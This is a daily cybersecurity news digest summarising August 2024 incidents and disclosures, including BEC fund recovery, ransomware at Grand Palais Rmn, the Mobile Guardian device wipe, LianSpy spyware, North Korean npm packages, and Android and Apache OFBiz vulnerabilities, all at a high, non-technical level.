Daily Brief

INTERPOL facilitated the recovery of $41 million stolen through a Business Email Compromise (BEC) scam targeting a Singaporean commodity firm. The firm was deceived into transferring $42.3 million to a fraudulent account after receiving a tampered email supposedly from a trusted supplier. Authorities used INTERPOL's Global Rapid Intervention of Payments (I-GRIP) mechanism to freeze $39 million in the fake bank account a day after the error was realized. An investigation led to the arrest of seven suspects in Southeast Asia, further recovering $2 million tied to the BEC scam. INTERPOL's I-GRIP program, launched in 2022, has helped intercept hundreds of millions of dollars from various financial and cybercrimes globally. The agency is urging businesses and individuals to implement preventative measures against BEC and other social engineering scams. INTERPOL also disclosed a crackdown on the cryptocurrency exchange "Cryptonator," involved in laundering proceeds from cybercrimes and offering inadequate anti-money laundering controls. Researchers noted the evolving risk of fraud in the cryptocurrency space, highlighting the abuse of blockchain protocols to conduct illicit fund transfers.

Grand Palais Réunion des musées nationaux (Rmn) in France experienced a ransomware attack on August 3, 2024. The cyberattack was reported to cause operational disruptions but did not affect the ongoing Olympic events taking place at the Grand Palais. Immediate actions were taken to isolate the issue, resulting in the temporary shutdown of systems to curtail the attack spread, affecting bookstores and boutiques at various museums. Despite initial disruptions, solutions were implemented allowing the museum shops to continue operations independently. Grand Palais Rmn alerted ANSSI, CNIL, and the Ministry of Culture, with ANSSI providing support in network recovery efforts. Preliminary investigations have shown no evidence of data exfiltration, although a ransom note was left by the attackers demanding payment in cryptocurrency. It is suspected that the breach resulted from the compromised credentials of a Grand Palais Rmn collaborator, obtained via info-stealer malware. No specific ransomware group has claimed responsibility for the attack, leaving the perpetrators unidentified.

A new technique termed "LNK Stomping" enables malware to avoid triggering Windows SmartScreen and Smart App Control alerts. This vulnerability, existing for over six years, involves manipulating .LNK files to remove the Mark of the Web (MotW), bypassing Microsoft's security checks. Elastic Security Labs disclosed this and other methods indicating potential weaknesses in Windows built-in protection systems. Other significant techniques discussed include Reputation Hijacking, Reputation Seeding, and Reputation Tampering aimed at undermining Windows reputation-based protections. Despite disclosure to Microsoft, there is yet no firm commitment on a patch, only a notation that it may be addressed in a future update. Samples of malware exploiting this bug have been identified on VirusTotal, with the oldest dating back six years. Security professionals are urged to update their detection systems to mitigate this vulnerability until an official patch is available from Microsoft.

A hacker infiltrated the Mobile Guardian platform, affecting North American, European, and Singaporean instances. Over 13,000 student devices in Singapore were remotely wiped, impacting iPads and Chromebooks. The breach occurred on August 4, 2024, and is not related to a prior IT outage on July 30. There has been no reported data exfiltration, though the devices were unenrolled and wiped. Mobile Guardian, a cross-platform classroom management tool, has temporarily suspended user access. The Singapore Ministry of Education has removed the compromised app from student devices and is assisting in recovery. Investigations continue to assess the full extent of the impact in other regions including North America and Europe.

Stolen credentials are increasingly utilized by cybercriminals to gain initial access to user accounts, creating heightened security demands and a booming market for such data. The ENISA Threat Landscape 2023 report highlights significant growth in the Initial Access Broker (IAB) market, with credentials being the prime commodities traded by cybercriminals. Common tactics to deploy stealer malware include social engineering, phishing, malvertising, and botnets such as Emotet and Qakbot to facilitate the theft of credentials. According to the Verizon 2024 Data Breach Investigation Report, the exploitation of vulnerabilities has surged by 180%, with stolen credentials being the most common initial action in breaches. Cybercriminals employ a variety of methods for stealing credentials, ranging from malware infection, brute-force attacks, to using search engine ads for directing users to malicious sites. High-profile breaches like SolarWinds and Dropbox underscore the significant risks and potential damage when credentials are compromised, especially if reused or poorly managed. Despite advances in cybersecurity measures such as multi-factor authentication, cybercriminals continue to find ways to circumvent these protections, emphasizing the need for continuous enhancement of security protocols. Organizations are urged to adopt stronger password policies and proactive vulnerability assessments to mitigate the risk posed by stolen credentials and improve overall cybersecurity posture.

Phishers and scammers exploit Outlook's "friendly name" feature to mask email origins, misleading users. Users across various organizations have voiced their concerns, pushing Microsoft to disable or alter this feature to enhance security. Microsoft’s support forums have seen more than 100 votes urging a change as this feature complicates the detection of fraudulent emails. Busy and stressed employees often fall for these deceptive emails, resulting in financial and mental health impacts. Current methods to show actual sender addresses are not practical for all users, especially in older Outlook versions. Feedback from many users indicates that while Microsoft invests in security through products like Defender in Azure, critical gaps like this remain. Professionals are pressing Microsoft to introduce an option to disable sender aliases, which could potentially mitigate significant security risks.

North Korea-linked Moonstone Sleet has continued to push malicious npm packages, aimed at Windows systems, into the JavaScript package registry. Recent malicious packages include 'harthat-api' and 'harthat-hash,' published on July 7, 2024, but were removed shortly after with no downloads reported. Datadog Security Labs, identifying the threat group under the moniker Stressed Pungsan, linked it with the activities of Moonstone Sleet. Attack methods include using bogus ZIP files on LinkedIn or freelancing sites to entice downloads, executing payloads involving malicious npm packages. Microsoft found that the npm packages could download additional payloads, such as SplitLoader, or lead to credential theft through malicious npm loaders. Checkmarx's findings highlighted attempts by Moonstone Sleet to deploy trial payloads through the npm registry, possibly testing their infrastructure. South Korea’s National Cyber Security Center has raised alarms regarding similar campaigns by North Korean groups targeting the construction and machinery sectors via compromised software updates.

Insider threats account for 26% of SaaS security incidents, highlighting significant risks to corporate data. Typically, insider threats involve legitimate users accessing SaaS applications during normal business hours, making detection challenging. Identity Threat Detection & Response (ITDR) platforms play a critical role in identifying suspicious behaviors within SaaS applications through monitored event logs. ITDR platforms can detect anomalies and indicators of compromise (IOCs), signaling potential internal threats when certain thresholds are met. SaaS Security Posture Management (SSPM) complements ITDR by enforcing Identity-First Security strategies and monitoring for data loss and compliance breaches. The Principle of Least Privilege (PoLP) is crucial, often revealing that employees have more access than necessary, increasing insider threat risks. Together, ITDR and SSPM provide a robust approach to preventing, detecting, and responding to insider threats in the SaaS environment.

Proton VPN has updated its Windows and Android apps to enhance user security and bypass censorship. A new 'Discreet Icon' feature in the Android app allows users to camouflage the VPN app as a common utility like a calculator or weather app, helping avoid detection in countries where VPNs are banned. The updated apps include a 'Stealth' protocol feature that makes VPN traffic appear as regular internet traffic, previously available only on iOS, macOS, and Android, now also on Windows. 'Stealth' protocol assists users in bypassing ISP blocks and avoiding scrutiny from authorities in restrictive regimes. Proton VPN plans to install new servers that simulate IP addresses from countries low on the Freedom House Index and Democracy Index to enhance service in restrictive regions. The new servers will not be physically located in the high-risk countries, but instead, use 'Smart Routing' to offer safer connections. These updates are immediately available, and users can activate new features through the settings menu of the updated app versions.

LianSpy, an Android spyware found by Kaspersky, uses Yandex Cloud for command-and-control to evade detection since at least 2021. The malware can capture screencasts, user files, call logs, and lists of apps, operating covertly with a wide range of permissions. Disguised as legitimate apps like Alipay or Android system services, it gains system-level access or asks for multiple permissions to draw screen overlays and access data. LianSpy manipulates system settings to avoid triggering privacy indicators for microphone and camera use introduced in Android 12. Uses a unique method to update configurations, checking Yandex Disk every 30 seconds for specific files to download. Data exfiltration is encrypted and managed via an SQL database, with decryption only possible by the attackers using an RSA key. Additionally, the malware suppresses notifications to remain unnoticed and employs root access for advanced operations without incoming commands. It uses legitimately appearing services to obscure its activity and complicate efforts to track the malware’s origins or actors.

An international law enforcement operation involving the FBI, IRS, and German police resulted in the shutdown of Cryptonator, an online cryptocurrency wallet and exchange platform. Cryptonator's services were allegedly used for laundering money, with transactions linked to sanctioned entities, dark-web marketplaces, ransomware, and stolen funds, totaling over $158 million. Special IRS agent Justin Allen provided testimony that Cryptonator was involved in significant illicit transactions, including those with entities sanctioned by the US. Roman Boss, the Russian CEO of Cryptonator residing in Germany, is charged with operating an unlicensed money transmitting business and conspiracy to commit money laundering. During undercover operations, FBI agents used Cryptonator to engage in transactions on dark web sites and with ransomware affiliates, strengthening the case against the platform. The U.S. Department of Justice and IRS are seeking the arrest of Roman Boss and the forfeiture of all funds connected to the criminal activities facilitated by Cryptonator.

Google has patched a high-severity vulnerability in the Android kernel, identified as CVE-2024-36971, which was actively exploited in the wild. The flaw allowed for remote code execution and was being used in limited, targeted attacks, potentially by commercial spyware vendors. The vulnerability disclosure was part of Google's August 2024 Android security bulletin, which included fixes for a total of 47 security issues. Other resolved issues include 12 privilege escalation flaws, one information disclosure bug, and one denial of service flaw in the Android Framework. The August update also covered vulnerabilities in components from Arm, Imagination Technologies, MediaTek, and Qualcomm. Earlier in June 2024, Google addressed a privilege elevation flaw in Pixel Firmware, also noted for being exploited in targeted attacks. The broader implications of the Pixel Firmware issue extend beyond Pixel devices to the broader Android ecosystem, with fixes being coordinated with OEM partners. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently mandated federal agencies to fix another unrelated but exploited flaw in Microsoft COM for Windows by August 26, 2024.

Mobile Guardian suffered a security incident on August 4, leading to unauthorized access to managed iOS and ChromeOS devices. In Singapore, the incident led to 13,000 student devices being remotely wiped, prompting the Education Ministry to sever its relationship with the vendor. The vendor specializes in device management for the education sector, including web filtering and classroom management tools. Despite assurances from Mobile Guardian that no user data was accessed, the scale of device disruption has caused significant concern. Affected regions include Europe and North America, with a small percentage of devices being unenrolled and wiped. This follows an April security issue where names and email addresses from Singaporean schools were compromised. Recent technical issues unrelated to the breach involved a configuration error disrupting student internet access. Singapore's Ministry of Education is now removing Mobile Guardian software from all student devices and seeking alternative security solutions.

A new zero-day vulnerability in Apache OFBiz ERP allows remote code execution, posed with a high severity CVSS score of 9.8. The flaw, identified as CVE-2024-38856, affects versions of Apache OFBiz prior to 18.12.15 and stems from a defect in the authentication mechanism. This vulnerability permits unauthorized users to access and execute code remotely by exploiting the authentication process flaws. CVE-2024-38856 also serves as a bypass for a previously addressed path traversal issue under CVE-2024-36104, revealing a patch insufficiency. The vulnerability is described to allow unauthenticated access via the ProgramExport endpoint, specifically when paired with other non-authentication requiring endpoints. This security flaw has ties to other critical vulnerabilities in Apache OFBiz, one of which is being exploited to deploy the Mirai botnet. Security exploits of such vulnerabilities have been actively increasing, as evidenced by previous breaches and ongoing threat actor activities.

Illinois has modified its Biometric Information Privacy Act (BIPA), decreasing fines for repetitive breaches of the same individual’s biometric data. Initially, BIPA penalized businesses $1,000 for negligent and $5,000 for intentional biometric data breaches per instance. The revised BIPA version, signed into law recently, treats multiple incidents of data sharing as one violation, potentially saving businesses billions in fines. Critics, including data privacy experts, argue that the amendment diminishes the deterrence against misuse of biometric data. Proponents, like the Information Technology and Innovation Foundation, argue the original law was overreaching and stymied business innovation with excessive penalties. High-profile cases like Meta's $550 million settlement over BIPA claims highlight the law's significant impact on large corporations. The amendment aims to balance the protection of biometric data with the practicalities of technological and business advancements.